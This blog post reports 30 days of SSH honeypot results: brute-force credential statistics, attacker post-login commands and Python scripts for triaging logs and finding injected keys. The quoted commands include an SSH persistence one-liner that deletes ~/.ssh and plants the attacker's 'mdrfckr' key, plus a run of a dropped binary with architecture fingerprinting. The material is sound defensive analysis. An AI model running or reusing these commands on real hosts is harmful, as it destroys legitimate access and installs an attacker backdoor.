# What You Get After Running an SSH Honeypot for 30 Days

Sofiane, 2024-02-15. Category: CyberSecurity > Authentication. Tags: BASHLITE, CyberSecurity, Gafgyt, MIPS, SofianeHamlaoui, mdrfkr, oinasf

## What is a honeypot?

A honeypot is a decoy system that records what attackers do when they try to break into it, so that their credentials, tools and commands can be studied without exposing a real server. The one discussed here is an SSH honeypot: it presents a fake SSH service, logs every login attempt, and records the commands an attacker runs after a successful login.

## Environment

- OS: Ubuntu 24.04 LTS x86_64
- Kernel: 6.8.0-31-generic

## Login Attempts

```sh
$ cat X.log | grep -c "login attempt"
11599
```

There were 11,599 login attempts in total. Spread over 30 days, that is an average of about 387 login attempts per day.

## Used Usernames

```sh
$ cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head
   8181 root
    977 345gs5662d34
    359 admin
    198 pi
    105 0
     71 ubuntu
     51 ubnt
     46 support
     37 user
     30 oracle
```

The pipeline takes the fifth whitespace-separated field of each login-attempt line, which holds the quoted user/password pair, and splits it on single quotes: field 2 is the username and field 4 the password (`grep -a` makes grep treat the log as text even if it contains non-text bytes). As expected, most attempts target well-known and default usernames: root by a wide margin, then admin, pi (Raspberry Pi OS), ubuntu, ubnt (Ubiquiti gear), support, user and oracle.
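As an added example (not part of the original post), here is the same statistic computed in Python instead of awk, with the user/password pairs kept together and a check against a few well-known default credentials. It assumes the log uses Cowrie's line format, where the pair appears as `[b'user'/b'password']` followed by `succeeded` or `failed`, which is the layout the awk pipelines in this section and in the Passwords section below rely on; the log lines in the block are constructed for the demo, not real captures, and the `KNOWN_DEFAULTS` list is mine.

```python
"""Credential statistics from SSH honeypot login-attempt lines.

Added example, not tooling from the post. It does what the post's awk
pipelines do (fifth field, split on single quotes, user in field 2 and
password in field 4) with a regex, and adds the user/password pairs and a
check against a few well-known default credentials. Assumes Cowrie's line
format, where the pair is written as [b'user'/b'password']. The sample
lines below are constructed for the demo, not real captures.
"""
import re
from collections import Counter

LOGIN_RE = re.compile(
    r"login attempt \[b'(?P<user>[^']*)'/b'(?P<password>[^']*)'\] "
    r"(?P<result>succeeded|failed)"
)

# Factory defaults that appear in the post's top-10 lists
# (pi/raspberry: Raspberry Pi OS, ubnt/ubnt: Ubiquiti). Extend as needed.
KNOWN_DEFAULTS = {("root", "root"), ("admin", "admin"),
                  ("pi", "raspberry"), ("ubnt", "ubnt")}

# Constructed sample in Cowrie's format; addresses are documentation ranges.
SAMPLE_LOG = """\
2024-01-17T03:12:44Z [HoneyPotSSHTransport,1201,198.51.100.7] login attempt [b'root'/b'123456'] failed
2024-01-17T03:12:45Z [HoneyPotSSHTransport,1201,198.51.100.7] login attempt [b'root'/b'password'] failed
2024-01-17T03:12:46Z [HoneyPotSSHTransport,1201,198.51.100.7] login attempt [b'root'/b'root'] succeeded
2024-01-17T03:13:02Z [HoneyPotSSHTransport,1202,203.0.113.9] login attempt [b'345gs5662d34'/b'345gs5662d34'] failed
2024-01-17T03:13:03Z [HoneyPotSSHTransport,1202,203.0.113.9] login attempt [b'345gs5662d34'/b'3245gs5662d34'] failed
2024-01-17T03:14:10Z [HoneyPotSSHTransport,1203,192.0.2.44] login attempt [b'pi'/b'raspberry'] succeeded
2024-01-17T03:14:11Z [HoneyPotSSHTransport,1203,192.0.2.44] CMD: uname -a
2024-01-17T03:15:30Z [HoneyPotSSHTransport,1204,203.0.113.9] login attempt [b'admin'/b'admin'] failed
2024-01-17T03:15:31Z [HoneyPotSSHTransport,1204,203.0.113.9] login attempt [b'root'/b'123456'] failed
"""


def parse_login_attempts(log_text):
    """Return (user, password, result) for every login-attempt line; other lines are ignored."""
    attempts = []
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            attempts.append((m["user"], m["password"], m["result"]))
    return attempts


def credential_stats(log_text, days=30, top=10):
    """Counts equivalent to the post's awk pipelines, plus pairs and default-credential hits."""
    attempts = parse_login_attempts(log_text)
    users = Counter(u for u, _, _ in attempts)
    passwords = Counter(p for _, p, _ in attempts)
    pairs = Counter((u, p) for u, p, _ in attempts)
    return {
        "total": len(attempts),
        "per_day": round(len(attempts) / days, 1),
        "succeeded": sum(1 for _, _, r in attempts if r == "succeeded"),
        "usernames": users.most_common(top),
        "passwords": passwords.most_common(top),
        "pairs": pairs.most_common(top),
        # user == password is a tell for credential lists built from device defaults
        "identical": sum(c for (u, p), c in pairs.items() if u == p),
        "known_default_hits": sum(c for pair, c in pairs.items() if pair in KNOWN_DEFAULTS),
    }


def format_report(stats):
    """Plain-text report in the same shape as `uniq -c | sort -nr` output."""
    lines = [f"{stats['total']} attempts, {stats['per_day']} per day, "
             f"{stats['succeeded']} succeeded, {stats['identical']} with user == password, "
             f"{stats['known_default_hits']} hitting known defaults"]
    for name in ("usernames", "passwords", "pairs"):
        lines.append(f"top {name}:")
        for value, count in stats[name]:
            label = value if isinstance(value, str) else "/".join(value)
            lines.append(f"{count:>7} {label}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_report(credential_stats(SAMPLE_LOG, days=1)))
```

Run it as a script to see the report over the sample, or pass the real log text to `credential_stats`. Like the awk pipeline it assumes neither username nor password contains a single quote; a line where one does simply fails to match and is skipped rather than mis-parsed.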
The username 345gs5662d34 is unusual. According to research from Aalborg University (Denmark), it could be a default credential of the Polycom CX600 IP telephone. See: SweetCam: an IP Camera Honeypot.

### Passwords

```sh
$ cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head
    977 345gs5662d34
    967 3245gs5662d34
    246 admin
    239 123456
    208 password
    155 0
     88 root
     75 raspberry
     73 123
     66 raspberryraspberry993311
```

The top password is 345gs5662d34 again, the suspected Polycom CX600 default. Its count matches the username's (977), which suggests the bot tries the same string as both username and password; 3245gs5662d34 looks like a variant of it. The rest are the usual suspects: admin, 123456, password, root and raspberry (the Raspberry Pi OS default for the pi user).

### Commands executed after login

```sh
$ cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr
   6775 echo -e "\x6F\x6B"
   1016 cd ~; chattr -ia .ssh; lockr -ia .ssh
   1016 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
    320 uname -s -v -n -r -m
    112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
     87 uname -a
     29 ps | grep '[Mm]iner'
     29 ps -ef | grep '[Mm]iner'
     29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
     29 ifconfig
     29 echo Hi | cat -n
     29 cat /proc/cpuinfo
     29 /ip cloud print
     23 whoami
     23 which ls
     23 w
     23 uname -m
     23 uname
     23 top
     23 lscpu | grep Model
     23 ls -lh $(which ls)
     23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
     23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
     23 crontab -l
     23 cat /proc/cpuinfo | grep name | wc -l
     23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
     23 cat /proc/cpuinfo | grep model | grep name | wc -l
```

By far the most common command, `echo -e "\x6F\x6B"`, just prints `ok`: it is the bot confirming that it has a working shell before doing anything else. Now the interesting part starts.

### The oinasf script

The 112-count line runs a file named oinasf (presumably uploaded to the session beforehand; the log only shows its execution) and then reads the first 22 bytes of the shell's own binary with `dd if=/proc/self/exe bs=22 count=1`, falling back to a `while read` loop and then to `cat` if dd is missing. Those bytes are the ELF header, which tells the bot the machine's architecture and endianness and whether it is talking to a real binary at all; this is a common way for IoT botnets to pick the right payload for the host and to spot emulated shells. The `uname -s -v -n -r -m` and `uname -a` lines collect the same kind of information (kernel, hostname, architecture) the easy way.

`/ip cloud print` is MikroTik RouterOS syntax (it prints the router's IP Cloud settings, including its public address), so the same credential-stuffing bots also land on MikroTik routers and use it to confirm where they are. The 29-count group looks for running miners (`ps | grep '[Mm]iner'`), for GSM modems and SMS daemons (`/dev/ttyGSM*`, smsd, the Qualcomm qmuxd socket), that is, for cellular gateways that could be abused to send SMS, and at the CPU and network interfaces. The 23-count group is a host inventory: CPU model and core count, memory, disk, crontab, the current user, and the size of the `ls` binary (a cheap check that the shell is real), the sort of survey a miner operator runs to decide whether the box is worth keeping. Taken together these commands show the bots' routine: check that the shell works, fingerprint the host, establish persistent access, and then assess what the machine is good for.

### The mdrfckr crypto miner

The two 1016-count commands are this campaign's persistence step, and the key comment mdrfckr is what gives the miner its name. The first strips the immutable and append-only attributes from ~/.ssh (`chattr -ia`; lockr is presumably a renamed copy of chattr carried by the attacker for hosts where chattr has been removed), which defeats the common trick of locking authorized_keys with `chattr +i`. The second wipes ~/.ssh entirely, writes a single 2048-bit RSA public key with the comment mdrfckr into authorized_keys and sets `chmod -R go=` so that only the owner can read the directory. The net effect is that every legitimate key is removed and the attacker's key becomes the only way in. Per the linked dump, the payload then installs a cron job to keep itself in place and kills any competing miner so that it has the CPU to itself. On a real host, the things to look for are an authorized_keys file containing the mdrfckr comment or this key's fingerprint, a ~/.ssh with only one unfamiliar key in it, and unfamiliar crontab entries.

You can check this repository from someone whose server was hit by this miner: Dump of the crypto-miner that got installed on my system - Github

### The MIPS malware

Probably another piece of malware built for the MIPS (Microprocessor without Interlocked Pipeline Stages) architecture, which is common in routers and other IoT devices; the architecture fingerprinting above is how bots decide which build to drop. Here is a good read on the behaviour of a MIPS backdoor: Analyzing a Backdoor/Bot for the MIPS Platform

### The Sakura.sh Script

This script is part of the Gafgyt malware family. Gafgyt, also known as BASHLITE, is a botnet that targets Internet of Things (IoT) devices and Linux-based systems.
It compromises and takes control of such devices, typically by exploiting weak or default passwords as well as known vulnerabilities. Gafgyt has been around since 2014 and has evolved into many variants with their own feature sets, including the ability to launch distributed denial of service (DDoS) attacks. Here is A Detailed Analysis of the Gafgyt Malware Targeting IoT Devices.

Copyright (c) 2012-2024 Sofiane Hamlaoui
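As an added example (not part of the original post or of the malware write-ups it links), here is a Python triage of the `CMD:` lines from the Commands section above. It buckets each command by intent (shell liveness check, architecture fingerprinting, SSH-key persistence, MikroTik probe, miner check, host inventory), pulls apart any public key that an `echo ... >> authorized_keys` command injects, computes its SHA256 fingerprint in the same form `ssh-keygen -lf` prints, and uses that fingerprint to find the key in an authorized_keys file, which is the check a defender wants after reading the mdrfckr section. The log lines are constructed for the demo: the commands in them, including the mdrfckr key, are the ones quoted in the post, while the timestamps, session ids, addresses and the ed25519 key in the sample authorized_keys are made up, and the category names are my own labels.

```python
"""Triage of post-login "CMD:" lines from an SSH honeypot log.

Added example, not tooling from the post. Assumes Cowrie-style lines in
which the executed command follows "CMD: ", as the post's awk pipeline does.
The sample log below is constructed: the commands are the ones quoted in the
post (including the mdrfckr key), everything else in it is made up.
"""
import base64
import binascii
import hashlib
import re
from collections import Counter

# The RSA public key the attacker appends to authorized_keys, as quoted in the post.
MDRFCKR_KEY = "AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw=="

# Constructed log; raw string so the \x6F\x6B bytes stay as the bot typed them.
SAMPLE_LOG = r"""
2024-01-20T11:02:10Z [HoneyPotSSHTransport,77,203.0.113.9] CMD: echo -e "\x6F\x6B"
2024-01-20T11:02:11Z [HoneyPotSSHTransport,77,203.0.113.9] CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh
2024-01-20T11:02:11Z [HoneyPotSSHTransport,77,203.0.113.9] CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa <KEY> mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
2024-01-20T11:02:12Z [HoneyPotSSHTransport,77,203.0.113.9] CMD: uname -s -v -n -r -m
2024-01-20T11:40:03Z [HoneyPotSSHTransport,78,198.51.100.7] CMD: echo -e "\x6F\x6B"
2024-01-20T11:40:04Z [HoneyPotSSHTransport,78,198.51.100.7] CMD: ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
2024-01-20T12:15:40Z [HoneyPotSSHTransport,79,192.0.2.44] CMD: /ip cloud print
2024-01-20T12:15:41Z [HoneyPotSSHTransport,79,192.0.2.44] CMD: ps | grep '[Mm]iner'
2024-01-20T12:15:42Z [HoneyPotSSHTransport,79,192.0.2.44] CMD: cat /proc/cpuinfo | grep name | wc -l
2024-01-20T12:15:43Z [HoneyPotSSHTransport,79,192.0.2.44] CMD: crontab -l
""".replace("<KEY>", MDRFCKR_KEY)

# First word of commands that only inventory the host (CPU, memory, disk, cron, users).
INVENTORY_CMDS = {"whoami", "w", "top", "lscpu", "free", "df", "crontab",
                  "cat", "ifconfig", "ls", "which"}


def first_word(cmd):
    parts = cmd.split(None, 1)
    return parts[0] if parts else ""


# Category rules, first match wins; the labels are this example's own.
RULES = [
    ("ssh-key-persistence", lambda c: "authorized_keys" in c),
    ("attribute-unlock", lambda c: re.search(r"\b(chattr|lockr) -ia\b", c) is not None),
    ("shell-liveness", lambda c: c in ('echo -e "\\x6F\\x6B"', "echo Hi | cat -n")),
    ("arch-fingerprint", lambda c: "/proc/self/exe" in c or first_word(c) == "uname"),
    ("mikrotik-probe", lambda c: c.startswith("/ip ")),
    ("miner-check", lambda c: "[Mm]iner" in c),
    ("gsm-modem-check", lambda c: "ttyGSM" in c or "smsd" in c),
    ("host-inventory", lambda c: first_word(c) in INVENTORY_CMDS),
]

# echo "<type> <base64 blob> [comment]" >> .../authorized_keys
KEY_RE = re.compile(r'"(ssh-[\w-]+) ([A-Za-z0-9+/=]+)(?: ([^"]*))?"\s*>>\s*\S*authorized_keys')


def classify(cmd):
    for name, match in RULES:
        if match(cmd):
            return name
    return "other"


def decode_ssh_key(blob_b64):
    """Parse an OpenSSH public-key blob into type, fingerprint and, for RSA, size and exponent."""
    raw = base64.b64decode(blob_b64)
    fields, off = [], 0
    while off + 4 <= len(raw):          # blob is a sequence of length-prefixed fields
        n = int.from_bytes(raw[off:off + 4], "big")
        fields.append(raw[off + 4:off + 4 + n])
        off += 4 + n
    digest = base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")
    info = {"type": fields[0].decode(), "fingerprint": "SHA256:" + digest}  # ssh-keygen -lf form
    if info["type"] == "ssh-rsa":       # fields: type, public exponent e, modulus n
        info["exponent"] = int.from_bytes(fields[1], "big")
        info["bits"] = int.from_bytes(fields[2], "big").bit_length()
    return info


def extract_injected_keys(cmd):
    """Keys written into an authorized_keys file by an echo ... >> command."""
    keys = []
    for _ktype, blob, comment in KEY_RE.findall(cmd):
        info = decode_ssh_key(blob)
        info["comment"] = comment
        keys.append(info)
    return keys


def triage(log_text):
    commands = [line.split("CMD: ", 1)[1].strip()
                for line in log_text.splitlines() if "CMD: " in line]
    return {
        "commands": Counter(commands),
        "categories": Counter(classify(c) for c in commands),
        "injected_keys": [k for c in sorted(set(commands)) for k in extract_injected_keys(c)],
    }


def find_key(authorized_keys_text, fingerprint):
    """authorized_keys lines whose key has the given SHA256 fingerprint (what to hunt for on real hosts)."""
    hits = []
    for line in authorized_keys_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("ssh-"):
            continue
        try:
            if decode_ssh_key(parts[1])["fingerprint"] == fingerprint:
                hits.append(line)
        except (binascii.Error, IndexError):   # malformed line, not a key
            continue
    return hits


# Constructed authorized_keys: a made-up ed25519 key plus the attacker's key.
FAKE_ED25519 = base64.b64encode(b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + bytes(32)).decode()
SAMPLE_AUTHORIZED_KEYS = f"ssh-ed25519 {FAKE_ED25519} admin@laptop\nssh-rsa {MDRFCKR_KEY} mdrfckr\n"

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for category, count in result["categories"].most_common():
        print(f"{count:>4} {category}")
    for key in result["injected_keys"]:
        print(key)
        print("present in authorized_keys:", find_key(SAMPLE_AUTHORIZED_KEYS, key["fingerprint"]))
```

Matching on the fingerprint rather than on the comment matters because the comment is free text an attacker can change between campaigns, while the fingerprint identifies the key itself; `find_key` can be pointed at every `authorized_keys` on a host, and the same `decode_ssh_key` output (type, size, exponent) is what you would compare against your own key inventory.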